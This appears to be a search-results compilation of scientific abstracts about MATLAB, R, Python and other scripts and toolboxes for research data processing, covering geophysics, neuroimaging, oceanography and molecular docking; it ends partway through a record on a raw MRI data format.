This is an R statistics package script that allows the reproduction of Figure 5. The script includes the links to large NetCDF files that the figures access for O3, CO, wind speed, radiation and PBL height. It pulls the timeseries for each variable at a number of cities (lat-lon specified). This dataset is associated with the following publication:Gilliam , R., C. Hogrefe , J. Godowitch, S. Napelenok , R. Mathur , and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
A MATLAB based 3D modeling and inversion code for MT data
NASA Astrophysics Data System (ADS)
Singh, Arun; Dehiya, Rahul; Gupta, Pravin K.; Israil, M.
2017-07-01
The development of a MATLAB based computer code, AP3DMT, for modeling and inversion of 3D Magnetotelluric (MT) data is presented. The code comprises two independent components: grid generator code and modeling/inversion code. The grid generator code performs model discretization and acts as an interface by generating various I/O files. The inversion code performs core computations in modular form - forward modeling, data functionals, sensitivity computations and regularization. These modules can be readily extended to other similar inverse problems like Controlled-Source EM (CSEM). The modular structure of the code provides a framework useful for implementation of new applications and inversion algorithms. The use of MATLAB and its libraries makes it more compact and user friendly. The code has been validated on several published models. To demonstrate its versatility and capabilities the results of inversion for two complex models are presented.
A Series of MATLAB Learning Modules to Enhance Numerical Competency in Applied Marine Sciences
NASA Astrophysics Data System (ADS)
Fischer, A. M.; Lucieer, V.; Burke, C.
2016-12-01
Enhanced numerical competency to navigate the massive data landscapes are critical skills students need to effectively explore, analyse and visualize complex patterns in high-dimensional data for addressing the complexity of many of the world's problems. This is especially the case for interdisciplinary, undergraduate applied marine science programs, where students are required to demonstrate competency in methods and ideas across multiple disciplines. In response to this challenge, we have developed a series of repository-based data exploration, analysis and visualization modules in MATLAB for integration across various attending and online classes within the University of Tasmania. The primary focus of these modules is to teach students to collect, aggregate and interpret data from large on-line marine scientific data repositories to, 1) gain technical skills in discovering, accessing, managing and visualising large, numerous data sources, 2) interpret, analyse and design approaches to visualise these data, and 3) to address, through numerical approaches, complex, real-world problems, that the traditional scientific methods cannot address. All modules, implemented through a MATLAB live script, include a short recorded lecture to introduce the topic, a handout that gives an overview of the activities, an instructor's manual with a detailed methodology and discussion points, a student assessment (quiz and level-specific challenge task), and a survey. The marine science themes addressed through these modules include biodiversity, habitat mapping, algal blooms and sea surface temperature change and utilize a series of marine science and oceanographic data portals. Through these modules students, with minimal experience in MATLAB or numerical methods are introduced to array indexing, concatenation, sorting, and reshaping, principal component analysis, spectral analysis and unsupervised classification within the context of oceanographic processes, marine geology and marine community ecology.
Spec2Harv: Converting Spectrum output to HARVEST input
Eric J. Gustafson; Luke V. Rasmussen; Larry A. Leefers
2003-01-01
Spec2Harv was developed to automate the conversion of harvest schedules generated by the Spectrum model into script files that can be used by the HARVEST simulation model to simulate the implementation of the Spectrum schedules in a spatially explicit way.
Laamrani, Ahmed; Pardo Lara, Renato; Berg, Aaron A; Branson, Dave; Joosse, Pamela
2018-02-27
Quantifying the amount of crop residue left in the field after harvest is a key issue for sustainability. Conventional assessment approaches (e.g., line-transect) are labor intensive, time-consuming and costly. Many proximal remote sensing devices and systems have been developed for agricultural applications such as cover crop and residue mapping. For instance, current mobile devices (smartphones & tablets) are usually equipped with digital cameras and global positioning systems and use applications (apps) for in-field data collection and analysis. In this study, we assess the feasibility and strength of a mobile device app developed to estimate crop residue cover. The performance of this novel technique (from here on referred to as "app" method) was compared against two point counting approaches: an established digital photograph-grid method and a new automated residue counting script developed in MATLAB at the University of Guelph. Both photograph-grid and script methods were used to count residue under 100 grid points. Residue percent cover was estimated using the app, script and photograph-grid methods on 54 vertical digital photographs (images of the ground taken from above at a height of 1.5 m) collected from eighteen fields (9 corn and 9 soybean, 3 samples each) located in southern Ontario. Results showed that residue estimates from the app method were in good agreement with those obtained from both photograph-grid and script methods (R² = 0.86 and 0.84, respectively). This study has found that the app underestimates the residue coverage by -6.3% and -10.8% when compared to the photograph-grid and script methods, respectively. With regards to residue type, soybean has a slightly lower bias than corn (i.e., -5.3% vs. -7.4%). For photos with residue <30%, the app derived residue measurements are within ±5% difference (bias) of both photograph-grid- and script-derived residue measurements. These methods could therefore be used to track the recommended minimum soil residue cover of 30%, implemented to reduce farmland topsoil and nutrient losses that impact water quality. Overall, the app method was found to be a good alternative to the point counting methods, which are more time-consuming.
Bacelli, Giorgio
2016-09-28
Modeling and performance data in Matlab data file (.mat) containing 3 structures (WEC model, simRes_sr and simRes_fix), and a pdf document describing the model, the simulations, and the analysis that has been carried out.
Characterizing and Quantifying Time Dependent Night Sky Brightness In and Around Tucson, Arizona
NASA Astrophysics Data System (ADS)
Nydegger, Rachel
2014-01-01
As part of a Research Experience for Undergraduates (REU) program with the National Optical Astronomy Observatory (NOAO), I (with mentor Dr. Constance Walker of NOAO) characterized light pollution in and near Tucson, Arizona using eight Sky Quality Meters (SQMs). In order to analyze the data in a consistent way for comparison, we created a standard procedure for reduction and analysis using python and MATLAB. The series of python scripts remove faulty data and examine specifically anthropogenic light pollution by excluding contributions made by the sun, moon, and the Milky Way. We then use MATLAB codes to illustrate how the light pollution changes in relation to time, distance from the city, and airglow. Data are then analyzed by a recently developed sky brightness model created by Dan Duriscoe of the National Park Service. To quantify the measurements taken by SQMs, we tested the wavelength sensitivity of the devices used for the data collection. The findings from the laboratory testing have prompted innovations for the SQMs as well as given a sense of how data gathered by these devices should be treated.
NASA Technical Reports Server (NTRS)
Deshpande, Manohar D.; Dudley, Kenneth
2003-01-01
A simple method is presented to estimate the complex dielectric constants of individual layers of a multilayer composite material. Using the MatLab Optimization Tools simple MatLab scripts are written to search for electric properties of individual layers so as to match the measured and calculated S-parameters. A single layer composite material formed by using materials such as Bakelite, Nomex Felt, Fiber Glass, Woven Composite B and G, Nano Material #0, Cork, Garlock, of different thicknesses are tested using the present approach. Assuming the thicknesses of samples unknown, the present approach is shown to work well in estimating the dielectric constants and the thicknesses. A number of two layer composite materials formed by various combinations of above individual materials are tested using the present approach. However, the present approach could not provide estimate values close to their true values when the thicknesses of individual layers were assumed to be unknown. This is attributed to the difficulty in modelling the presence of airgaps between the layers while doing the measurement of S-parameters. A few examples of three layer composites are also presented.
NASA Technical Reports Server (NTRS)
Steck, Daniel
2009-01-01
This report documents the generation of an outbound Earth to Moon transfer preliminary database consisting of four cases calculated twice a day for a 19 year period. The database was desired as the first step in order for NASA to rapidly generate Earth to Moon trajectories for the Constellation Program using the Mission Assessment Post Processor. The completed database was created running a flight trajectory and optimization program, called Copernicus, in batch mode with the use of newly created Matlab functions. The database is accurate and has high data resolution. The techniques and scripts developed to generate the trajectory information will also be directly used in generating a comprehensive database.
Fully automated processing of fMRI data in SPM: from MRI scanner to PACS.
Maldjian, Joseph A; Baer, Aaron H; Kraft, Robert A; Laurienti, Paul J; Burdette, Jonathan H
2009-01-01
Here we describe the Wake Forest University Pipeline, a fully automated method for the processing of fMRI data using SPM. The method includes fully automated data transfer and archiving from the point of acquisition, real-time batch script generation, distributed grid processing, interface to SPM in MATLAB, error recovery and data provenance, DICOM conversion and PACS insertion. It has been used for automated processing of fMRI experiments, as well as for the clinical implementation of fMRI and spin-tag perfusion imaging. The pipeline requires no manual intervention, and can be extended to any studies requiring offline processing.
SBEToolbox: A Matlab Toolbox for Biological Network Analysis
Konganti, Kranti; Wang, Gang; Yang, Ence; Cai, James J.
2013-01-01
We present SBEToolbox (Systems Biology and Evolution Toolbox), an open-source Matlab toolbox for biological network analysis. It takes a network file as input, calculates a variety of centralities and topological metrics, clusters nodes into modules, and displays the network using different graph layout algorithms. Straightforward implementation and the inclusion of high-level functions allow the functionality to be easily extended or tailored through developing custom plugins. SBEGUI, a menu-driven graphical user interface (GUI) of SBEToolbox, enables easy access to various network and graph algorithms for programmers and non-programmers alike. All source code and sample data are freely available at https://github.com/biocoder/SBEToolbox/releases. PMID:24027418
SBEToolbox: A Matlab Toolbox for Biological Network Analysis.
Konganti, Kranti; Wang, Gang; Yang, Ence; Cai, James J
2013-01-01
We present SBEToolbox (Systems Biology and Evolution Toolbox), an open-source Matlab toolbox for biological network analysis. It takes a network file as input, calculates a variety of centralities and topological metrics, clusters nodes into modules, and displays the network using different graph layout algorithms. Straightforward implementation and the inclusion of high-level functions allow the functionality to be easily extended or tailored through developing custom plugins. SBEGUI, a menu-driven graphical user interface (GUI) of SBEToolbox, enables easy access to various network and graph algorithms for programmers and non-programmers alike. All source code and sample data are freely available at https://github.com/biocoder/SBEToolbox/releases.
NASA Astrophysics Data System (ADS)
Bhattacharjee, T.; Kumar, P.; Fillipe, L.
2018-02-01
Vibrational spectroscopy, especially FTIR and Raman, has shown enormous potential in disease diagnosis, especially in cancers. Their potential for detecting varied pathological conditions are regularly reported. However, to prove their applicability in clinics, large multi-center multi-national studies need to be undertaken; and these will result in enormous amount of data. A parallel effort to develop analytical methods, including user-friendly software that can quickly pre-process data and subject them to required multivariate analysis is warranted in order to obtain results in real time. This study reports a MATLAB based script that can automatically import data, preprocess spectra— interpolation, derivatives, normalization, and then carry out Principal Component Analysis (PCA) followed by Linear Discriminant Analysis (LDA) of the first 10 PCs; all with a single click. The software has been verified on data obtained from cell lines, animal models, and in vivo patient datasets, and gives results comparable to Minitab 16 software. The software can be used to import variety of file extensions, asc, .txt., .xls, and many others. Options to ignore noisy data, plot all possible graphs with PCA factors 1 to 5, and save loading factors, confusion matrices and other parameters are also present. The software can provide results for a dataset of 300 spectra within 0.01 s. We believe that the software will be vital not only in clinical trials using vibrational spectroscopic data, but also to obtain rapid results when these tools get translated into clinics.
SimITK: rapid ITK prototyping using the Simulink visual programming environment
NASA Astrophysics Data System (ADS)
Dickinson, A. W. L.; Mousavi, P.; Gobbi, D. G.; Abolmaesumi, P.
2011-03-01
The Insight Segmentation and Registration Toolkit (ITK) is a long-established, software package used for image analysis, visualization, and image-guided surgery applications. This package is a collection of C++ libraries, that can pose usability problems for users without C++ programming experience. To bridge the gap between the programming complexities and the required learning curve of ITK, we present a higher-level visual programming environment that represents ITK methods and classes by wrapping them into "blocks" within MATLAB's visual programming environment, Simulink. These blocks can be connected to form workflows: visual schematics that closely represent the structure of a C++ program. Due to the heavily C++ templated nature of ITK, direct interaction between Simulink and ITK requires an intermediary to convert their respective datatypes and allow intercommunication. We have developed a "Virtual Block" that serves as an intermediate wrapper around the ITK class and is responsible for resolving the templated datatypes used by ITK to native types used by Simulink. Presently, the wrapping procedure for SimITK is semi-automatic in that it requires XML descriptions of the ITK classes as a starting point, as this data is used to create all other necessary integration files. The generation of all source code and object code from the XML is done automatically by a CMake build script that yields Simulink blocks as the final result. An example 3D segmentation workflow using cranial-CT data as well as a 3D MR-to-CT registration workflow are presented as a proof-of-concept.
Counter-Flow Cooling Tower Test Cell
NASA Astrophysics Data System (ADS)
Dvořák, Lukáš; Nožička, Jiří
2014-03-01
The article contains a design of a functional experimental model of a cross-flow mechanical draft cooling tower and the results and outcomes of measurements. This device is primarily used for measuring performance characteristics of cooling fills, but with a simple rebuild, it can be used for measuring other thermodynamic processes that take part in so-called wet cooling. The main advantages of the particular test cell lie in the accuracy, size, and the possibility of changing the water distribution level. This feature is very useful for measurements of fills of different heights without the influence of the spray and rain zone. The functionality of this test cell has been verified experimentally during assembly, and data from the measurement of common film cooling fills have been compared against the results taken from another experimental line. For the purpose of evaluating the data gathered, computational scripts were created in the MATLAB numerical computing environment. The first script is for exact calculation of the thermal balance of the model, and the second is for determining Merkel's number via Chebyshev's method.
FracPaQ: A MATLAB™ toolbox for the quantification of fracture patterns
NASA Astrophysics Data System (ADS)
Healy, David; Rizzo, Roberto E.; Cornwell, David G.; Farrell, Natalie J. C.; Watkins, Hannah; Timms, Nick E.; Gomez-Rivas, Enrique; Smith, Michael
2017-02-01
The patterns of fractures in deformed rocks are rarely uniform or random. Fracture orientations, sizes, and spatial distributions often exhibit some kind of order. In detail, relationships may exist among the different fracture attributes, e.g. small fractures dominated by one orientation, larger fractures by another. These relationships are important because the mechanical (e.g. strength, anisotropy) and transport (e.g. fluids, heat) properties of rock depend on these fracture attributes and patterns. This paper describes FracPaQ, a new open source, cross-platform toolbox to quantify fracture patterns, including distributions in fracture attributes and their spatial variation. Software has been developed to quantify fracture patterns from 2-D digital images, such as thin section micrographs, geological maps, outcrop or aerial photographs or satellite images. The toolbox comprises a suite of MATLAB™ scripts based on previously published quantitative methods for the analysis of fracture attributes: orientations, lengths, intensity, density and connectivity. An estimate of permeability in 2-D is made using a parallel plate model. The software provides an objective and consistent methodology for quantifying fracture patterns and their variations in 2-D across a wide range of length scales, rock types and tectonic settings. The implemented methods presented are inherently scale independent, and a key task where applicable is analysing and integrating quantitative fracture pattern data from micro-to macro-scales. The toolbox was developed in MATLAB™ and the source code is publicly available on GitHub™ and the Mathworks™ FileExchange. The code runs on any computer with MATLAB installed, including PCs with Microsoft Windows, Apple Macs with Mac OS X, and machines running different flavours of Linux. The application, source code and sample input files are available in open repositories in the hope that other developers and researchers will optimise and extend the functionality for the benefit of the wider community.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Tran, Anh Phuong; Dafflon, Baptiste; Hubbard, Susan
TOUGH2 and iTOUGH2 are powerful models that simulate the heat and fluid flows in porous and fracture media, and perform parameter estimation, sensitivity analysis and uncertainty propagation analysis. However, setting up the input files is not only tedious, but error prone, and processing output files is time consuming. Here, we present an open source Matlab-based tool (iMatTOUGH) that supports the generation of all necessary inputs for both TOUGH2 and iTOUGH2 and visualize their outputs. The tool links the inputs of TOUGH2 and iTOUGH2, making sure the two input files are consistent. It supports the generation of rectangular computational mesh, i.e.,more » it automatically generates the elements and connections as well as their properties as required by TOUGH2. The tool also allows the specification of initial and time-dependent boundary conditions for better subsurface heat and water flow simulations. The effectiveness of the tool is illustrated by an example that uses TOUGH2 and iTOUGH2 to estimate soil hydrological and thermal properties from soil temperature data and simulate the heat and water flows at the Rifle site in Colorado.« less
Tran, Anh Phuong; Dafflon, Baptiste; Hubbard, Susan
2016-04-01
TOUGH2 and iTOUGH2 are powerful models that simulate the heat and fluid flows in porous and fracture media, and perform parameter estimation, sensitivity analysis and uncertainty propagation analysis. However, setting up the input files is not only tedious, but error prone, and processing output files is time consuming. Here, we present an open source Matlab-based tool (iMatTOUGH) that supports the generation of all necessary inputs for both TOUGH2 and iTOUGH2 and visualize their outputs. The tool links the inputs of TOUGH2 and iTOUGH2, making sure the two input files are consistent. It supports the generation of rectangular computational mesh, i.e.,more » it automatically generates the elements and connections as well as their properties as required by TOUGH2. The tool also allows the specification of initial and time-dependent boundary conditions for better subsurface heat and water flow simulations. The effectiveness of the tool is illustrated by an example that uses TOUGH2 and iTOUGH2 to estimate soil hydrological and thermal properties from soil temperature data and simulate the heat and water flows at the Rifle site in Colorado.« less
Bounded tracking for nonminimum phase nonlinear systems with fast zero dynamics
DOT National Transportation Integrated Search
1996-12-01
A PostScript file. In this paper, tracking control laws for nonminimum phase nonlinear systems with both fast and slow, possibly unstable, zero dynamics are derived. The fast zero dynamics arise from a perturbation of a nominal system. These fast zer...
SciServer Compute brings Analysis to Big Data in the Cloud
NASA Astrophysics Data System (ADS)
Raddick, Jordan; Medvedev, Dmitry; Lemson, Gerard; Souter, Barbara
2016-06-01
SciServer Compute uses Jupyter Notebooks running within server-side Docker containers attached to big data collections to bring advanced analysis to big data "in the cloud." SciServer Compute is a component in the SciServer Big-Data ecosystem under development at JHU, which will provide a stable, reproducible, sharable virtual research environment.SciServer builds on the popular CasJobs and SkyServer systems that made the Sloan Digital Sky Survey (SDSS) archive one of the most-used astronomical instruments. SciServer extends those systems with server-side computational capabilities and very large scratch storage space, and further extends their functions to a range of other scientific disciplines.Although big datasets like SDSS have revolutionized astronomy research, for further analysis, users are still restricted to downloading the selected data sets locally - but increasing data sizes make this local approach impractical. Instead, researchers need online tools that are co-located with data in a virtual research environment, enabling them to bring their analysis to the data.SciServer supports this using the popular Jupyter notebooks, which allow users to write their own Python and R scripts and execute them on the server with the data (extensions to Matlab and other languages are planned). We have written special-purpose libraries that enable querying the databases and other persistent datasets. Intermediate results can be stored in large scratch space (hundreds of TBs) and analyzed directly from within Python or R with state-of-the-art visualization and machine learning libraries. Users can store science-ready results in their permanent allocation on SciDrive, a Dropbox-like system for sharing and publishing files. Communication between the various components of the SciServer system is managed through SciServer‘s new Single Sign-on Portal.We have created a number of demos to illustrate the capabilities of SciServer Compute, including Python and R scripts accessing a range of datasets and showing the data flow between storage and compute components.Demos, documentation, and more information can be found at www.sciserver.org.SciServer is funded by the National Science Foundation Award ACI-1261715.
The GOLM-database standard- a framework for time-series data management based on free software
NASA Astrophysics Data System (ADS)
Eichler, M.; Francke, T.; Kneis, D.; Reusser, D.
2009-04-01
Monitoring and modelling projects usually involve time series data originating from different sources. Often, file formats, temporal resolution and meta-data documentation rarely adhere to a common standard. As a result, much effort is spent on converting, harmonizing, merging, checking, resampling and reformatting these data. Moreover, in work groups or during the course of time, these tasks tend to be carried out redundantly and repeatedly, especially when new data becomes available. The resulting duplication of data in various formats strains additional ressources. We propose a database structure and complementary scripts for facilitating these tasks. The GOLM- (General Observation and Location Management) framework allows for import and storage of time series data of different type while assisting in meta-data documentation, plausibility checking and harmonization. The imported data can be visually inspected and its coverage among locations and variables may be visualized. Supplementing scripts provide options for data export for selected stations and variables and resampling of the data to the desired temporal resolution. These tools can, for example, be used for generating model input files or reports. Since GOLM fully supports network access, the system can be used efficiently by distributed working groups accessing the same data over the internet. GOLM's database structure and the complementary scripts can easily be customized to specific needs. Any involved software such as MySQL, R, PHP, OpenOffice as well as the scripts for building and using the data base, including documentation, are free for download. GOLM was developed out of the practical requirements of the OPAQUE-project. It has been tested and further refined in the ERANET-CRUE and SESAM projects, all of which used GOLM to manage meteorological, hydrological and/or water quality data.
Conversion of the Aeronautics Interactive Workstation
NASA Technical Reports Server (NTRS)
Riveras, Nykkita L.
2004-01-01
This summer I am working in the Educational Programs Office. My task is to convert the Aeronautics Interactive Workstation from a Macintosh (Mac) platform to a Personal Computer (PC) platform. The Aeronautics Interactive Workstation is a workstation in the Aerospace Educational Laboratory (AEL), which is one of the three components of the Science, Engineering, Mathematics, and Aerospace Academy (SEMAA). The AEL is a state-of-the-art, electronically enhanced, computerized classroom that puts cutting-edge technology at the fingertips of participating students. It provides a unique learning experience regarding aerospace technology that features activities equipped with aerospace hardware and software that model real-world challenges. The Aeronautics Interactive Workstation, in particular, offers a variety of activities pertaining to the history of aeronautics. When the Aeronautics Interactive Workstation was first implemented into the AEL it was designed with Macromedia Director 4 for a Mac. Today it is being converted to Macromedia DirectorMX2004 for a PC. Macromedia Director is the proven multimedia tool for building rich content and applications for CDs, DVDs, kiosks, and the Internet. It handles the widest variety of media and offers powerful features for building rich content that delivers red results, integrating interactive audio, video, bitmaps, vectors, text, fonts, and more. Macromedia Director currently offers two programmingkripting languages: Lingo, which is Director's own programmingkripting language and JavaScript. In the workstation, Lingo is used in the programming/scripting since it was the only language in use when the workstation was created. Since the workstation was created with an older version of Macromedia Director it hosted significantly different programming/scripting protocols. In order to successfully accomplish my task, the final product required correction of Xtra and programming/scripting errors. I also had to convert the Mac platform file extensions into compatible file extensions for a PC.
Inertial Manifolds for Navier-Stokes Equations and Related Dynamical Systems
1991-05-31
Graphics IRIS (SGI). The RLE files for the animation are loaded to an Abekas and recorded to tape by Betacam . This computational work was done by using the...scripts and comments, are loaded to the Abekas-A60 digital image storage device, and then recorded to the Betacam BVW-75 analog tape recorder. Static...interfacing, huge data files are output to the Data Vault parallelly with little cost. In addition to the SGIs, Abekas, Betacam and Solitaire, the
CrossTalk. The Journal of Defense Software Engineering. Volume 16, Number 11, November 2003
2003-11-01
memory area, and stack pointer. These systems are classified as preemptive or nonpreemptive depending on whether they can preempt an existing task or not...of charge. The Software Technology Support Center was established at Ogden Air Logistics Center (AFMC) by Headquarters U.S. Air Force to help Air...device. A script file could be a list of commands for a command interpreter such as a batch file [15]. A communications port consists of a queue to hold
A Study and Taxonomy of Vulnerabilities in Web Based Animation and Interactivity Software
2010-12-01
Flash Player is available as a plugin for most common Web browsers (Firefox, Mozilla, Netscape, Opera) and as an ActiveX control for Internet...script or HTML via (1) a swf file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX ...malicious page or open a malicious file. 2. Coding an Exploit The specific flaw exists in the Flash Player ActiveX Control’s handling of the
Simple proteomics data analysis in the object-oriented PowerShell.
Mohammed, Yassene; Palmblad, Magnus
2013-01-01
Scripting languages such as Perl and Python are appreciated for solving simple, everyday tasks in bioinformatics. A more recent, object-oriented command shell and scripting language, Windows PowerShell, has many attractive features: an object-oriented interactive command line, fluent navigation and manipulation of XML files, ability to consume Web services from the command line, consistent syntax and grammar, rich regular expressions, and advanced output formatting. The key difference between classical command shells and scripting languages, such as bash, and object-oriented ones, such as PowerShell, is that in the latter the result of a command is a structured object with inherited properties and methods rather than a simple stream of characters. Conveniently, PowerShell is included in all new releases of Microsoft Windows and therefore already installed on most computers in classrooms and teaching labs. In this chapter we demonstrate how PowerShell in particular allows easy interaction with mass spectrometry data in XML formats, connection to Web services for tools such as BLAST, and presentation of results as formatted text or graphics. These features make PowerShell much more than "yet another scripting language."
Using STOQS and stoqstoolbox for in situ Measurement Data Access in Matlab
NASA Astrophysics Data System (ADS)
López-Castejón, F.; Schlining, B.; McCann, M. P.
2012-12-01
This poster presents the stoqstoolbox, an extension to Matlab that simplifies the loading of in situ measurement data directly from STOQS databases. STOQS (Spatial Temporal Oceanographic Query System) is a geospatial database tool designed to provide efficient access to data following the CF-NetCDF Discrete Samples Geometries convention. Data are loaded from CF-NetCDF files into a STOQS database where indexes are created on depth, spatial coordinates and other parameters, e.g. platform type. STOQS provides consistent, simple and efficient methods to query for data. For example, we can request all measurements with a standard_name of sea_water_temperature between two times and from between two depths. Data access is simpler because the data are retrieved by parameter irrespective of platform or mission file names. Access is more efficient because data are retrieved via the index on depth and only the requested data are retrieved from the database and transferred into the Matlab workspace. Applications in the stoqstoolbox query the STOQS database via an HTTP REST application programming interface; they follow the Data Access Object pattern, enabling highly customizable query construction. Data are loaded into Matlab structures that clearly indicate latitude, longitude, depth, measurement data value, and platform name. The stoqstoolbox is designed to be used in concert with other tools, such as nctoolbox, which can load data from any OPeNDAP data source. With these two toolboxes a user can easily work with in situ and other gridded data, such as from numerical models and remote sensing platforms. In order to show the capability of stoqstoolbox we will show an example of model validation using data collected during the May-June 2012 field experiment conducted by the Monterey Bay Aquarium Research Institute (MBARI) in Monterey Bay, California. The data are available from the STOQS server at http://odss.mbari.org/canon/stoqs_may2012/query/. Over 14 million data points of 18 parameters from 6 platforms measured over a 3-week period are available on this server. The model used for comparison is the Regional Ocean Modeling System developed by Jet Propulsion Laboratory for the Monterey Bay. The model output are loaded into Matlab using nctoolbox from the JPL server at http://ourocean.jpl.nasa.gov:8080/thredds/dodsC/MBNowcast. Model validation with in situ measurements can be difficult because of different file formats and because data may be spread across individual data systems for each platform. With stoqstoolbox the researcher must know only the URL of the STOQS server and the OPeNDAP URL of the model output. With selected depth and time constraints a user's Matlab program searches for all in situ measurements available for the same time, depth and variable of the model. STOQS and stoqstoolbox are open source software projects supported by MBARI and the David and Lucile Packard foundation. For more information please see http://code.google.com/p/stoqs.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Chung, Youngjoo; Kim, Keeman.
1991-01-01
An operating system shell GPDAS (General Purpose Data Acquisition Shell) on MS-DOS-based microcomputers has been developed to provide flexibility in data acquisition and device control for magnet measurements at the Advanced Photon Source. GPDAS is both a command interpreter and an integrated script-based programming environment. It also incorporates the MS-DOS shell to make use of the existing utility programs for file manipulation and data analysis. Features include: alias definition, virtual memory, windows, graphics, data and procedure backup, background operation, script programming language, and script level debugging. Data acquisition system devices can be controlled through IEEE488 board, multifunction I/O board, digitalmore » I/O board and Gespac crate via Euro G-64 bus. GPDAS is now being used for diagnostics R D and accelerator physics studies as well as for magnet measurements. Their hardware configurations will also be discussed. 3 refs., 3 figs.« less
NASA Technical Reports Server (NTRS)
Sen, Syamal K.; Shaykhian, Gholam Ali
2011-01-01
MatLab(TradeMark)(MATrix LABoratory) is a numerical computation and simulation tool that is used by thousands Scientists and Engineers in many countries. MatLab does purely numerical calculations, which can be used as a glorified calculator or interpreter programming language; its real strength is in matrix manipulations. Computer algebra functionalities are achieved within the MatLab environment using "symbolic" toolbox. This feature is similar to computer algebra programs, provided by Maple or Mathematica to calculate with mathematical equations using symbolic operations. MatLab in its interpreter programming language form (command interface) is similar with well known programming languages such as C/C++, support data structures and cell arrays to define classes in object oriented programming. As such, MatLab is equipped with most of the essential constructs of a higher programming language. MatLab is packaged with an editor and debugging functionality useful to perform analysis of large MatLab programs and find errors. We believe there are many ways to approach real-world problems; prescribed methods to ensure foregoing solutions are incorporated in design and analysis of data processing and visualization can benefit engineers and scientist in gaining wider insight in actual implementation of their perspective experiments. This presentation will focus on data processing and visualizations aspects of engineering and scientific applications. Specifically, it will discuss methods and techniques to perform intermediate-level data processing covering engineering and scientific problems. MatLab programming techniques including reading various data files formats to produce customized publication-quality graphics, importing engineering and/or scientific data, organizing data in tabular format, exporting data to be used by other software programs such as Microsoft Excel, data presentation and visualization will be discussed.
Brain model of text animation as a data mining strategy.
Astakhova, Tamara; Astakhov, Vadim
2009-01-01
Imagination is the critical point in developing of realistic intelligence (AI) systems. One way to approach imagination would be simulation of its properties and operations. We developed two models "Brain Network Hierarchy of Languages," and "Semantical Holographic Calculus" and simulation system ScriptWriter that emulate the process of imagination through an automatic animation of English texts. The purpose of this paper is to demonstrate the model and present "ScriptWriter" system http://nvo.sdsc.edu/NVO/JCSG/get_SRB_mime_file2.cgi//home/tamara.sdsc/test/demo.zip?F=/home/tamara.sdsc/test/demo.zip&M=application/x-gtar for simulation of the imagination.
Ellingson, Sally R; Dakshanamurthy, Sivanesan; Brown, Milton; Smith, Jeremy C; Baudry, Jerome
2014-04-25
In this paper we give the current state of high-throughput virtual screening. We describe a case study of using a task-parallel MPI (Message Passing Interface) version of Autodock4 [1], [2] to run a virtual high-throughput screen of one-million compounds on the Jaguar Cray XK6 Supercomputer at Oak Ridge National Laboratory. We include a description of scripts developed to increase the efficiency of the predocking file preparation and postdocking analysis. A detailed tutorial, scripts, and source code for this MPI version of Autodock4 are available online at http://www.bio.utk.edu/baudrylab/autodockmpi.htm.
Yaxx: Yet another X-ray extractor
NASA Astrophysics Data System (ADS)
Aldcroft, Tom
2013-06-01
Yaxx is a Perl script that facilitates batch data processing using Perl open source software and commonly available software such as CIAO/Sherpa, S-lang, SAS, and FTOOLS. For Chandra and XMM analysis it includes automated spectral extraction, fitting, and report generation. Yaxx can be run without climbing an extensive learning curve; even so, yaxx is highly configurable and can be customized to support complex analysis. yaxx uses template files and takes full advantage of the unique Sherpa / S-lang environment to make much of the processing user configurable. Although originally developed with an emphasis on X-ray data analysis, yaxx evolved to be a general-purpose pipeline scripting package.
2011-06-01
file – Open source at http://c4i.gmu.edu/BML 10 BMLC2GUI ICCRTS’11-175 BML C2 GUI Scripted BML Web Service v2 09F- SIW -015 11 ! BML C2...BMLC2GUI ICCRTS’11-175 17 Publish/Subscribe Architecture BMLC2GUI ICCRTS’11-175 SBML in NATO MSG-048 • Paper 10S- SIW -049 describes a significant...from C2LG GUI: – Open resource – Quick response to changes – Ease of use – Low development cost Scripted BML Web Service v2 09F- SIW -015
UNIX-BASED DATA MANAGEMENT SYSTEM FOR PROPAGATION EXPERIMENTS
NASA Technical Reports Server (NTRS)
Kantak, A. V.
1994-01-01
This collection of programs comprises The UNIX Based Data Management System for the Pilot Field Experiment (PiFEx) which is an attempt to mimic the Mobile Satellite (MSAT) scenario. The major purposes of PiFEx are to define the mobile communications channels and test the workability of new concepts used to design various components of the receiver system. The results of the PiFex experiment are large amounts of raw data which must be accessed according to a researcher's needs. This package provides a system to manage the PiFEx data in an interactive way. The system not only provides the file handling necessary to retrieve the desired data, but also several FORTRAN programs to generate some standard results pertaining to propagation data. This package assumes that the data file initially generated from the experiment has been already converted from binary to ASCII format. The Data Management system described here consists of programs divided into two categories: those programs that handle the PiFEx generated files and those that are used for number-crunching of these files. Five FORTRAN programs and one UNIX shell script file are used for file manipulation purposes. These activities include: calibration of the acquired data; and parsing of the large data file into datasets concerned with different aspects of the experiment such as the specific calibrated propagation data, dynamic and static loop error data, statistical data, and temperature and spatial data on the hardware used in the experiment. The five remaining FORTRAN programs are used to generate usable information about the data. Signal level probability, probability density of the signal fitting the Rician density function, frequency of the data's fade duration, and the Fourier transform of the data can all be generated from these data manipulation programs. In addition, a program is provided which generates a downloadable file from the signal levels and signal phases files for use with the plotting routine AKPLOT (NPO-16931). All programs in this package are written in either FORTRAN-77 or UNIX shell-scripts. The package does not include test data. The programs were developed in 1987 for use with a UNIX operating system on a DEC MicroVAX computer.
The perspectives, information and conclusions conveyed in research project abstracts, progress reports, final reports, journal abstracts and journal publications convey the viewpoints of the principal investigator and may not represent the views and policies of ORD and EPA. Concl...
A Google Earth Grand Tour of the Terrestrial Planets
ERIC Educational Resources Information Center
De Paor, Declan; Coba, Filis; Burgin, Stephen
2016-01-01
Google Earth is a powerful instructional resource for geoscience education. We have extended the virtual globe to include all terrestrial planets. Downloadable Keyhole Markup Language (KML) files (Google Earth's scripting language) associated with this paper include lessons about Mercury, Venus, the Moon, and Mars. We created "grand…
ISMRM Raw Data Format: A Proposed Standard for MRI Raw Datasets
Inati, Souheil J.; Naegele, Joseph D.; Zwart, Nicholas R.; Roopchansingh, Vinai; Lizak, Martin J.; Hansen, David C.; Liu, Chia-Ying; Atkinson, David; Kellman, Peter; Kozerke, Sebastian; Xue, Hui; Campbell-Washburn, Adrienne E.; Sørensen, Thomas S.; Hansen, Michael S.
2015-01-01
